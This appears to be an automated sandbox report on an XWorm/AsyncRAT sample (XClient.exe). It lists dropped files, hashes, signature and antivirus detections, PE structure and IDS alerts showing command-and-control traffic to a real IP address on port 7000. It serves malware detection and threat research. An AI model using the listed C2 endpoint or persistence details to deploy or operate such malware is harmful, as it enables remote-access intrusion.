                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                    Process:C:\Users\user\Desktop\XClient.exe
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Jan 3 12:06:58 2025, mtime=Fri Jan 3 12:06:59 2025, atime=Fri Jan 3 12:06:58 2025, length=41984, window=hide
                    Category:dropped
                    Size (bytes):764
                    Entropy (8bit):5.053190431527314
                    Encrypted:false
                    SSDEEP:12:8j324I9hTWC78dY//ILp0La/djAsKrHkfpqHrHoBmV:8jDI9ws8+kU0ZAsKYfpqHrHoBm
                    MD5:A7EF7354D416D3A12E1F1B289197CA04
                    SHA1:565B54A914DA690B7D1D2BDEF652004B6CA773A1
                    SHA-256:E50C9E500CCC767E5D501C28AED1636301C62D8597A48F41B4B560AFFAC4679E
                    SHA-512:2B557608928B2A77FD4F23736E3A22BC5C6ECCEC9EAD981CF8691B5E713429E76A4C40424E488E20F41CE0E270A3FEA63777E11DD62BA97B413975A29D21FBA7
                    Malicious:false
                    Reputation:low
                    Preview:L..................F.... ....|.^.]..0wq_.]...|.^.]..........................v.:..DG..Yr?.D..U..k0.&...&......vk.v.....-OX.]...R,_.]......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^#Z.h...........................%..A.p.p.D.a.t.a...B.V.1.....#Z.h..Roaming.@......CW.^#Z.h..........................eSe.R.o.a.m.i.n.g.....b.2.....#Z.h .XClient.exe.H......#Z.h#Z.h...........................u..X.C.l.i.e.n.t...e.x.e.......Y...............-.......X............*z......C:\Users\user\AppData\Roaming\XClient.exe........\.....\.....\.....\.....\.X.C.l.i.e.n.t...e.x.e.`.......X.......210979...........hT..CrF.f4... ...T..b...,.......hT..CrF.f4... ...T..b...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                    Process:C:\Users\user\Desktop\XClient.exe
                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Category:dropped
                    Size (bytes):41984
                    Entropy (8bit):5.594602217818213
                    Encrypted:false
                    SSDEEP:768:hJn0mOvGjMI5r2NpaNFu9vsOChR6RklT:ht0raCNaFu9vsOCLYmT
                    MD5:2E525CCEBF9EDE7492931251EB66571A
                    SHA1:A0598BFFA349759FB3DCF130CF93ED41A3C3D8F4
                    SHA-256:FDEFEDD8F02446DD47723F4B1829F685F64E76B9D29002545DD4C5D5257EAE29
                    SHA-512:2E459CA08A91FE27F0C3BE7BC73E5EC9E3B10B17CE99F11372DA0E0176E8647419E8C1B0478F0D3CE763246E92B84293AB42CE9769BB8BBF3F9B3D7DDA9FEA01
                    Malicious:true
                    Yara Hits:
                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: Joe Security
                    • Rule: rat_win_xworm_v3, Description: Finds XWorm (version XClient, v3) samples based on characteristic strings, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: Sekoia.io
                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: ditekSHen
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    • Antivirus: ReversingLabs, Detection: 74%
                    • Antivirus: Virustotal, Detection: 68%, Browse
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....!mg................................ ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......L\..<\............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..
                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Entropy (8bit):5.594602217818213
                    TrID:
                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                    • Win32 Executable (generic) a (10002005/4) 49.75%
                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                    • Windows Screen Saver (13104/52) 0.07%
                    • Generic Win/DOS Executable (2004/3) 0.01%
                    File name:XClient.exe
                    File size:41'984 bytes
                    MD5:2e525ccebf9ede7492931251eb66571a
                    SHA1:a0598bffa349759fb3dcf130cf93ed41a3c3d8f4
                    SHA256:fdefedd8f02446dd47723f4b1829f685f64e76b9d29002545dd4c5d5257eae29
                    SHA512:2e459ca08a91fe27f0c3be7bc73e5ec9e3b10b17ce99f11372da0e0176e8647419e8c1b0478f0d3ce763246e92b84293ab42ce9769bb8bbf3f9b3d7dda9fea01
                    SSDEEP:768:hJn0mOvGjMI5r2NpaNFu9vsOChR6RklT:ht0raCNaFu9vsOCLYmT
                    TLSH:0A135C0837E04626D9FF6FF959F362030B31E5035913D7AE0CE5899B1B67B84CA4179A
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....!mg................................. ........@.. ....................................@................................
                    Icon Hash:90cececece8e8eb0
                    Entrypoint:0x40b8de
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Time Stamp:0x676D21E8 [Thu Dec 26 09:29:12 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:4
                    OS Version Minor:0
                    File Version Major:4
                    File Version Minor:0
                    Subsystem Version Major:4
                    Subsystem Version Minor:0
                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                    Instruction
                    jmp dword ptr [00402000h]
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb888 | 0x53 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc000 | 0x4d8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xe000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x98e4 | 0x9a00 | 671f9584bf24256d711c81f614358341 | False | 0.4957132711038961 | data | 5.713572049892492 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xc000 | 0x4d8 | 0x600 | 2472af5ddbb53779b7381f16b8b9407b | False | 0.3756510416666667 | data | 3.7216503306685733 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xe000 | 0xc | 0x200 | 24f7d304061bf2d9404c5ca731b0cde8 | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xc0a0 | 0x244 | data | | | 0.4724137931034483
RT_MANIFEST | 0xc2e8 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-03T14:07:19.183005+0100 | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:07:19.356985+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:07:19.383879+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:07:26.053811+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:07:26.053811+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:07:32.199336+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:07:32.200994+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:07:45.057721+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:07:45.119776+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:07:55.943481+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:07:55.943481+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:07:57.899617+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:07:57.900946+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:08:07.931512+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:08:07.937369+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:08:08.429735+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:08:08.431252+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:08:18.960693+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:08:18.962533+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:08:19.131552+0100 | 2853193 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:08:19.225076+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:08:19.225960+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:08:19.312128+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:08:19.314165+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:08:19.358606+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:08:19.361315+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:08:19.477694+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:08:19.479640+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:08:25.839737+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:08:25.847864+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
2025-01-03T14:08:25.963366+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:08:25.963366+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:08:29.322721+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.125.47 | 7000 | 192.168.2.4 | 49731 | TCP
2025-01-03T14:08:29.328176+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49731 | 87.120.125.47 | 7000 | TCP
                    2025-01-03T14:08:29.409395+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:29.411984+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:29.503593+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:29.505485+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:29.597019+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:29.603256+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:34.622947+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:34.624385+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:34.716125+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:34.717433+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:34.809161+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:34.810988+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:34.894946+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:34.896488+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:34.989565+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:34.991018+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:35.084120+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:35.085619+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:35.178907+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:35.184981+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:47.867467+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:47.869276+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:48.601585+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:48.602944+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:49.289059+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:49.297369+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:50.461112+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:50.464486+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:50.551238+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:50.552997+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:50.644750+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:50.646220+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:50.723432+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:50.725396+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:50.802939+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:50.897646+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:50.902763+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:50.995663+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:51.007122+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:51.088767+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:51.093644+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:53.336467+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:53.342240+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:54.930018+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:54.931644+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:55.851922+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:55.858233+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:55.981477+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:55.981477+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:58.211406+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:58.258236+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:09:01.136759+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:09:01.138062+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:09:01.225686+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:09:01.322255+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:09:06.476691+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:09:06.478780+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:09:11.325602+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:09:11.330253+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:09:13.336525+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:09:13.344413+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:09:13.436101+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:09:13.440256+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:09:20.229781+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:09:20.233278+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:09:21.476571+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
